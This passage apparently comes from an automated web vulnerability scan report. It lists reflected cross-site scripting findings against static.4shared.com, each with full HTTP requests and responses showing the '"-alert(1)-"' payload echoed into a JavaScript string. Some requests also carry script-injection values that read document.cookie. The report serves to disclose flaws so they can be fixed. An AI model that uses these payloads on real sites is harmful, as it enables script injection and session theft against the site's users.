Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundleseba06"-alert(1)-"0dae7da8be1/css/630963420/css/openid.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /bundleseba06&quot;-alert(1)-&quot;0dae7da8be1/css/630963420/css/openid.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2D6048BB9FB76323C5C3BE99CEBF5256.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:33 GMT
Content-Length: 36275


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundleseba06"-alert(1)-"0dae7da8be1/css/630963420/css/openid.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
functio
...[SNIP]...

1.194. http://static.4shared.com/bundles/css/630963420/css/openid.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/630963420/css/openid.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2dac"-alert(1)-"8e22e060db7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles/cssc2dac"-alert(1)-"8e22e060db7/630963420/css/openid.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /bundles/cssc2dac&quot;-alert(1)-&quot;8e22e060db7/630963420/css/openid.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FBF240C76EC127DA98FA6F09514E90FB.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:39 GMT
Content-Length: 36264


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles/cssc2dac"-alert(1)-"8e22e060db7/630963420/css/openid.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function fe
...[SNIP]...

1.195. http://static.4shared.com/bundles/css/677814427/css/upload-frame.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/677814427/css/upload-frame.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a0ff"-alert(1)-"7efa6baafe1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles7a0ff"-alert(1)-"7efa6baafe1/css/677814427/css/upload-frame.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /bundles7a0ff&quot;-alert(1)-&quot;7efa6baafe1/css/677814427/css/upload-frame.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C9A0A5D1372DE2F395F2A8F70FB5F31E.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:57 GMT
Content-Length: 36305


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles7a0ff"-alert(1)-"7efa6baafe1/css/677814427/css/upload-frame.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
f
...[SNIP]...

1.196. http://static.4shared.com/bundles/css/677814427/css/upload-frame.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/677814427/css/upload-frame.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 783a9"-alert(1)-"fe838ec3fce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles/css783a9"-alert(1)-"fe838ec3fce/677814427/css/upload-frame.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /bundles/css783a9&quot;-alert(1)-&quot;fe838ec3fce/677814427/css/upload-frame.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=304A6285BAAEAEA780FB81E9E5975246.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:03 GMT
Content-Length: 36305


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles/css783a9"-alert(1)-"fe838ec3fce/677814427/css/upload-frame.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
funct
...[SNIP]...

1.197. http://static.4shared.com/bundles/css/765844602/css/flags.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/765844602/css/flags.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4888"-alert(1)-"558cf729ae5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundlese4888"-alert(1)-"558cf729ae5/css/765844602/css/flags.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; search.view2=ls

Response

HTTP/1.1 404 /bundlese4888&quot;-alert(1)-&quot;558cf729ae5/css/765844602/css/flags.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=12177EB456CEE1C9AFF4E125678D208A.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 01:56:58 GMT
Content-Length: 36373


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundlese4888"-alert(1)-"558cf729ae5/css/765844602/css/flags.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function
...[SNIP]...

1.198. http://static.4shared.com/bundles/css/765844602/css/flags.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/765844602/css/flags.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55cbe"-alert(1)-"bce3fca82c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles/css55cbe"-alert(1)-"bce3fca82c4/765844602/css/flags.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; search.view2=ls

Response

HTTP/1.1 404 /bundles/css55cbe&quot;-alert(1)-&quot;bce3fca82c4/765844602/css/flags.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4A31C5648BE49CC8FA265F59DDBF3C6C.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 01:57:07 GMT
Content-Length: 36373


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles/css55cbe"-alert(1)-"bce3fca82c4/765844602/css/flags.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function fee
...[SNIP]...

1.199. http://static.4shared.com/bundles/css/N162308233/css/network.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/N162308233/css/network.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 499e1"-alert(1)-"af069d79772 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles499e1"-alert(1)-"af069d79772/css/N162308233/css/network.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; search.view2=ls

Response

HTTP/1.1 404 /bundles499e1&quot;-alert(1)-&quot;af069d79772/css/N162308233/css/network.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8FE0ABC5F9D90922FE6288DE17D525C3.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 01:56:58 GMT
Content-Length: 36388


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles499e1"-alert(1)-"af069d79772/css/N162308233/css/network.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
funct
...[SNIP]...

1.200. http://static.4shared.com/bundles/css/N162308233/css/network.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/N162308233/css/network.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 216fd"-alert(1)-"7a2ba26463d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles/css216fd"-alert(1)-"7a2ba26463d/N162308233/css/network.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; search.view2=ls

Response

HTTP/1.1 404 /bundles/css216fd&quot;-alert(1)-&quot;7a2ba26463d/N162308233/css/network.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2B8D94FCBEA8898B3426C9E00B7FE2E5.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 01:57:07 GMT
Content-Length: 36388


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles/css216fd"-alert(1)-"7a2ba26463d/N162308233/css/network.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function
...[SNIP]...

1.201. http://static.4shared.com/bundles/css/N90201876/css/ajax-suggestions.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/N90201876/css/ajax-suggestions.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1530f"-alert(1)-"5c8612fc249 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles1530f"-alert(1)-"5c8612fc249/css/N90201876/css/ajax-suggestions.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /bundles1530f&quot;-alert(1)-&quot;5c8612fc249/css/N90201876/css/ajax-suggestions.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B17461934EAD1091733A85356597E328.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:40 GMT
Content-Length: 36325


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles1530f"-alert(1)-"5c8612fc249/css/N90201876/css/ajax-suggestions.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}

...[SNIP]...

1.202. http://static.4shared.com/bundles/css/N90201876/css/ajax-suggestions.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/N90201876/css/ajax-suggestions.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2117a"-alert(1)-"c970855b872 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles/css2117a"-alert(1)-"c970855b872/N90201876/css/ajax-suggestions.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /bundles/css2117a&quot;-alert(1)-&quot;c970855b872/N90201876/css/ajax-suggestions.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C16C4564F26D125869512CC66192510F.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:47 GMT
Content-Length: 36325


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles/css2117a"-alert(1)-"c970855b872/N90201876/css/ajax-suggestions.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
f
...[SNIP]...

1.203. http://static.4shared.com/bundles/css/gzip_630963420/css/openid.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/gzip_630963420/css/openid.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 163b1"-alert(1)-"297eae2c019 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles163b1"-alert(1)-"297eae2c019/css/gzip_630963420/css/openid.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Cache-Control: max-age=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /bundles163b1&quot;-alert(1)-&quot;297eae2c019/css/gzip_630963420/css/openid.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CFEBAD46D8406FDC60AABD88429B07B6.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:48 GMT
Content-Length: 36319


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles163b1"-alert(1)-"297eae2c019/css/gzip_630963420/css/openid.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
fu
...[SNIP]...

1.204. http://static.4shared.com/bundles/css/gzip_630963420/css/openid.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/gzip_630963420/css/openid.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30f3d"-alert(1)-"0dd0c41e0d3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles/css30f3d"-alert(1)-"0dd0c41e0d3/gzip_630963420/css/openid.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Cache-Control: max-age=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /bundles/css30f3d&quot;-alert(1)-&quot;0dd0c41e0d3/gzip_630963420/css/openid.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2891AA2AF3FD3761E519E71601B78FFD.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:50:54 GMT
Content-Length: 36319


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles/css30f3d"-alert(1)-"0dd0c41e0d3/gzip_630963420/css/openid.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
functi
...[SNIP]...

1.205. http://static.4shared.com/bundles/css/gzip_677814427/css/upload-frame.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /bundles/css/gzip_677814427/css/upload-frame.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b65f"-alert(1)-"5a3a52c1156 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bundles9b65f"-alert(1)-"5a3a52c1156/css/gzip_677814427/css/upload-frame.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Cache-Control: max-age=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
